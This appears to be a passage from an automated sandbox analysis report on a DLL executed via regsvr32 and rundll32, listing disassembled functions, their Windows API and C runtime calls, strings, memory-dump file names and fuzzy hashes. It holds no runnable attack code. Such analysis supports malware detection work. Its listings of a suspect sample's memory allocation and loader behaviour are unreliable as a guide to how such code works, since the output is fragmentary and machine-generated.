API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65

Uniqueness

Uniqueness Score: -1.00%

Function 100337CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 100337DB

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 100337F2
__amsg_exit.LIBCMT ref: 10033800
__lock.LIBCMT ref: 10033810

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91

Uniqueness

Uniqueness Score: -1.00%

Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
PathFindExtensionA.SHLWAPI(?), ref: 10021778

Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669

Strings

%s%s.dll, xrefs: 10021781

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003785E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499

__getptd.LIBCMT ref: 1003786D

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003787B

Strings

csm, xrefs: 10037889

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002AC8F, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6944 Parent PID: 6852 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	451
Total number of Limit Nodes:	17

Executed Functions

Function 10002D40, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1

SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88

Strings

`Nt, xrefs: 10002E9B
Ot, xrefs: 10002F36

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: Ot$`Nt
API String ID: 1452528299-908354541
Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
GlobalHandle.KERNEL32(03360728), ref: 1002AE1E
GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
GlobalReAlloc.KERNEL32 ref: 1002AE41
GlobalHandle.KERNEL32(03360728), ref: 1002AE53
GlobalLock.KERNEL32 ref: 1002AE5A
LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
GlobalLock.KERNEL32 ref: 1002AE6F
_memset.LIBCMT ref: 1002AE89
LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002E595

Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F

___sbh_find_block.LIBCMT ref: 1002E5A0
___sbh_free_block.LIBCMT ref: 1002E5AF
RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100036BB

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Strings

+';, xrefs: 100036A0

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID: +';
API String ID: 501242067-2694261586
Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9

_malloc.LIBCMT ref: 100034B7

Strings

+';, xrefs: 10003440

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: _malloc
String ID: +';
API String ID: 1579825452-2694261586
Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10024BD0, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 10024BD7

Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F

Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66

Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
String ID:
API String ID: 1104862767-0
Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15

Uniqueness

Uniqueness Score: -1.00%

Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memcpy_s.LIBCMT ref: 1001FBE6

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 1002B0C2

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
